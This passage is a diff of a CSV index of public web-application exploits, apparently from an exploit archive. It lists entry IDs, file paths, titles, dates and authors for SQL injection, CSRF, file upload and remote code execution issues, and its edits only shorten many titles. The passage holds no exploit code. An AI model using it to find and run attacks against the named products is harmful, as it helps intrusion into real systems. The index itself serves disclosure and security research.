Team",php,webapps,0 40724,platforms/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",php,webapps,80 40725,platforms/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,php,webapps,0 @@ -37683,7 +37684,7 @@ id,file,description,date,author,platform,type,port 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80 -40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 +40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 40932,platforms/php/webapps/40932.txt,"WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80 40934,platforms/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,php,webapps,80 40939,platforms/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 @@ -37709,16 +37710,16 @@ id,file,description,date,author,platform,type,port 40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0 40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0 40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0 -40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0 +40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0 41027,platforms/php/webapps/41027.txt,"Dating Script 3.25 - SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0 -41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0 -41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0 -41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - 'linkid' Parameter SQL Injection",2017-01-10,JaMbA,php,webapps,0 +41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0 +41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' SQL Injection",2017-01-09,v3n0m,php,webapps,0 +41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - 'linkid' SQL Injection",2017-01-10,JaMbA,php,webapps,0 41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0 41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0 41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0 -41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0 -41010,platforms/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0 +41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' SQL Injection",2017-01-11,"Ben Lee",php,webapps,0 +41010,platforms/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0 41011,platforms/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps,0 41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0 41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (1)",2017-01-10,Vulnerability-Lab,hardware,webapps,0 @@ -37726,7 +37727,7 @@ id,file,description,date,author,platform,type,port 41024,platforms/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0 41028,platforms/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0 41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0 -41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0 +41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' SQL Injection",2017-01-11,v3n0m,php,webapps,0 41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0 41034,platforms/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0 41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 @@ -37770,7 +37771,7 @@ id,file,description,date,author,platform,type,port 41083,platforms/php/webapps/41083.txt,"dirLIST 0.3.0 - Arbitrary File Upload",2017-01-17,hyp3rlinx,php,webapps,0 41084,platforms/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,php,webapps,0 41086,platforms/aspx/webapps/41086.txt,"Check Box 2016 Q2 Survey - Multiple Vulnerabilities",2017-01-17,"Fady Mohammed Osman",aspx,webapps,0 -41087,platforms/php/webapps/41087.txt,"Openexpert 0.5.17 - 'area_id' Parameter SQL Injection",2017-01-17,"Nassim Asrir",php,webapps,0 +41087,platforms/php/webapps/41087.txt,"Openexpert 0.5.17 - 'area_id' SQL Injection",2017-01-17,"Nassim Asrir",php,webapps,0 41091,platforms/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41092,platforms/php/webapps/41092.txt,"Fileserve Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",php,webapps,0 41093,platforms/php/webapps/41093.txt,"Auction Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 @@ -37786,7 +37787,7 @@ id,file,description,date,author,platform,type,port 41103,platforms/php/webapps/41103.txt,"NGO Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41104,platforms/php/webapps/41104.txt,"Yoga and Fitness Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41105,platforms/php/webapps/41105.txt,"NGO Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 -41106,platforms/php/webapps/41106.txt,"Questions and Answers Script 1.1.3 - 'id' Parameter SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 +41106,platforms/php/webapps/41106.txt,"Questions and Answers Script 1.1.3 - 'id' SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41107,platforms/php/webapps/41107.txt,"Online Mobile Recharge Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41108,platforms/php/webapps/41108.txt,"Clone of Oddee Script 1.1.3 - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41109,platforms/php/webapps/41109.txt,"Online Printing Business Clone Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 @@ -37816,7 +37817,7 @@ id,file,description,date,author,platform,type,port 41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 -41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0 +41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0 41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0 41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0 41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0 @@ -37841,35 +37842,35 @@ id,file,description,date,author,platform,type,port 41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0 41185,platforms/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps,0 41186,platforms/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 -41187,platforms/php/webapps/41187.txt,"Itech Auction Script 6.49 - 'mcid' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41187,platforms/php/webapps/41187.txt,"Itech Auction Script 6.49 - 'mcid' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 41188,platforms/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 -41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 41190,platforms/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 41191,platforms/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 -41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - 'pl' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 -41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - 'inf' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - 'pl' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - 'inf' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 41195,platforms/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 41197,platforms/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0 41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0 -41199,platforms/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41199,platforms/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0 41205,platforms/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0 41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 -41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 +41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 41204,platforms/php/webapps/41204.txt,"Itech Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 41208,platforms/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",hardware,webapps,0 -41209,platforms/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' Parameter SQL Injection",2017-01-28,"Persian Hack Team",php,webapps,0 -41210,platforms/php/webapps/41210.txt,"LogoStore - 'query' Parameter SQL Injection",2017-02-01,"Kaan KAMIS",php,webapps,0 +41209,platforms/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",php,webapps,0 +41210,platforms/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",php,webapps,0 41223,platforms/linux/webapps/41223.py,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)",2017-02-02,leonjza,linux,webapps,0 41224,platforms/linux/webapps/41224.rb,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",linux,webapps,0 41231,platforms/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0 -41225,platforms/php/webapps/41225.txt,"Property Listing Script - 'propid' Parameter Blind SQL Injection",2017-02-02,"Kaan KAMIS",php,webapps,0 +41225,platforms/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",php,webapps,0 41226,platforms/php/webapps/41226.txt,"Itech Inventory Management Software 3.77 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0 41230,platforms/php/webapps/41230.txt,"Itech Movie Portal Script 7.37 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0 -41228,platforms/php/webapps/41228.txt,"Itech News Portal Script 6.28 - 'sc' Parameter SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0 -41229,platforms/php/webapps/41229.txt,"Itech Auction Script 6.49 - 'pid' Parameter SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0 -41235,platforms/php/webapps/41235.txt,"SlimarUSER Management 1.0 - 'id' Parameter SQL Injection",2017-02-03,"Kaan KAMIS",php,webapps,0 +41228,platforms/php/webapps/41228.txt,"Itech News Portal Script 6.28 - 'sc' SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0 +41229,platforms/php/webapps/41229.txt,"Itech Auction Script 6.49 - 'pid' SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps,0 +41235,platforms/php/webapps/41235.txt,"SlimarUSER Management 1.0 - 'id' SQL Injection",2017-02-03,"Kaan KAMIS",php,webapps,0 41238,platforms/php/webapps/41238.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-02-03,Th3GundY,php,webapps,0 41239,platforms/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",php,webapps,80 41241,platforms/php/webapps/41241.txt,"Alstrasoft EPay Enterprise 5.17 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 @@ -37879,34 +37880,34 @@ id,file,description,date,author,platform,type,port 41245,platforms/php/webapps/41245.html,"Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0 41246,platforms/php/webapps/41246.html,"Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0 41247,platforms/php/webapps/41247.txt,"Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 -41249,platforms/php/webapps/41249.pl,"Alstrasoft Template Seller Pro 3.25e - 'tempid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 +41249,platforms/php/webapps/41249.pl,"Alstrasoft Template Seller Pro 3.25e - 'tempid' SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 41250,platforms/php/webapps/41250.txt,"Itech Job Portal Script 9.13 - Multiple Vulnerabilities",2017-02-04,Th3GundY,php,webapps,0 -41251,platforms/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 -41252,platforms/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 -41253,platforms/php/webapps/41253.txt,"ThisIsWhyImBroke Clone Script 4.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41254,platforms/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41255,platforms/php/webapps/41255.txt,"Ultimate Viral Media Script 1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41251,platforms/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 +41252,platforms/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0 +41253,platforms/php/webapps/41253.txt,"ThisIsWhyImBroke Clone Script 4.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41254,platforms/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41255,platforms/php/webapps/41255.txt,"Ultimate Viral Media Script 1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 41256,platforms/php/webapps/41256.txt,"Visual Link Sharing Websites Builder Script 2.1.0 - SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41266,platforms/php/webapps/41266.txt,"Fully Featured News CMS 1.0 - 'id' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 -41267,platforms/php/webapps/41267.txt,"MySQL File Uploader 1.0 - 'id' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 -41258,platforms/php/webapps/41258.txt,"Funny Image and Video Script 2.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41259,platforms/php/webapps/41259.txt,"Clone Script Directory Script 1.1.0 - 'cid' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41260,platforms/php/webapps/41260.txt,"Viral Pictures and Video Script 2.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41266,platforms/php/webapps/41266.txt,"Fully Featured News CMS 1.0 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 +41267,platforms/php/webapps/41267.txt,"MySQL File Uploader 1.0 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 +41258,platforms/php/webapps/41258.txt,"Funny Image and Video Script 2.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41259,platforms/php/webapps/41259.txt,"Clone Script Directory Script 1.1.0 - 'cid' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41260,platforms/php/webapps/41260.txt,"Viral Pictures and Video Script 2.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 41261,platforms/php/webapps/41261.txt,"NewsBee CMS - SQL Injection",2017-02-06,"Kaan KAMIS",php,webapps,0 -41262,platforms/php/webapps/41262.txt,"Web Inspiration Gallery Script 1.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41263,platforms/php/webapps/41263.txt,"Viral Fun Facts Sharing Script 1.1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41264,platforms/php/webapps/41264.txt,"Questions and Answers Script 2.0.0 - 'cid' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 -41268,platforms/php/webapps/41268.txt,"Easy Support Tools 1.0 - 'stt' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 -41269,platforms/php/webapps/41269.txt,"Easy Web Search 3 - 'id' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 +41262,platforms/php/webapps/41262.txt,"Web Inspiration Gallery Script 1.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41263,platforms/php/webapps/41263.txt,"Viral Fun Facts Sharing Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41264,platforms/php/webapps/41264.txt,"Questions and Answers Script 2.0.0 - 'cid' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0 +41268,platforms/php/webapps/41268.txt,"Easy Support Tools 1.0 - 'stt' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 +41269,platforms/php/webapps/41269.txt,"Easy Web Search 3 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0 41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0 41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0 41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0 41279,platforms/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0 -41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' Parameter SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0 +41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0 41283,platforms/php/webapps/41283.txt,"Mobiketa 3.5 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0 41284,platforms/php/webapps/41284.txt,"Sendroid 5.2 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0 41285,platforms/php/webapps/41285.txt,"Fome SMS Portal 2.0 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0 -41286,platforms/php/webapps/41286.txt,"SOA School Management - 'view' Parameter SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0 +41286,platforms/php/webapps/41286.txt,"SOA School Management - 'view' SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0 41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0 41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0 41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0 @@ -37930,44 +37931,44 @@ id,file,description,date,author,platform,type,port 41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0 41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0 41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0 -41328,platforms/php/webapps/41328.txt,"Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 +41328,platforms/php/webapps/41328.txt,"Joomla! Component Soccer Bet 4.1.5 - 'userid' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 -41316,platforms/php/webapps/41316.txt,"Viavi Movie Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 -41317,platforms/php/webapps/41317.txt,"Viavi Product Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 -41318,platforms/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 -41319,platforms/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 -41322,platforms/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 -41323,platforms/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 -41324,platforms/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 -41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 +41316,platforms/php/webapps/41316.txt,"Viavi Movie Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 +41317,platforms/php/webapps/41317.txt,"Viavi Product Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 +41318,platforms/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 +41319,platforms/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0 +41322,platforms/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 +41323,platforms/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 +41324,platforms/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 +41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 -41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 +41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0 41329,platforms/php/webapps/41329.txt,"PHP Marketplace Script - SQL Injection",2017-02-13,Th3GundY,php,webapps,0 -41330,platforms/php/webapps/41330.txt,"Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41331,platforms/php/webapps/41331.txt,"Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41332,platforms/php/webapps/41332.txt,"Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41333,platforms/php/webapps/41333.txt,"Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41330,platforms/php/webapps/41330.txt,"Joomla! Component JE Classify Ads 1.2 - 'pro_id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41331,platforms/php/webapps/41331.txt,"Joomla! Component JE Gallery 1.3 - 'photo_id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41332,platforms/php/webapps/41332.txt,"Joomla! Component JE Directory 1.7 - 'ditemid' SQL 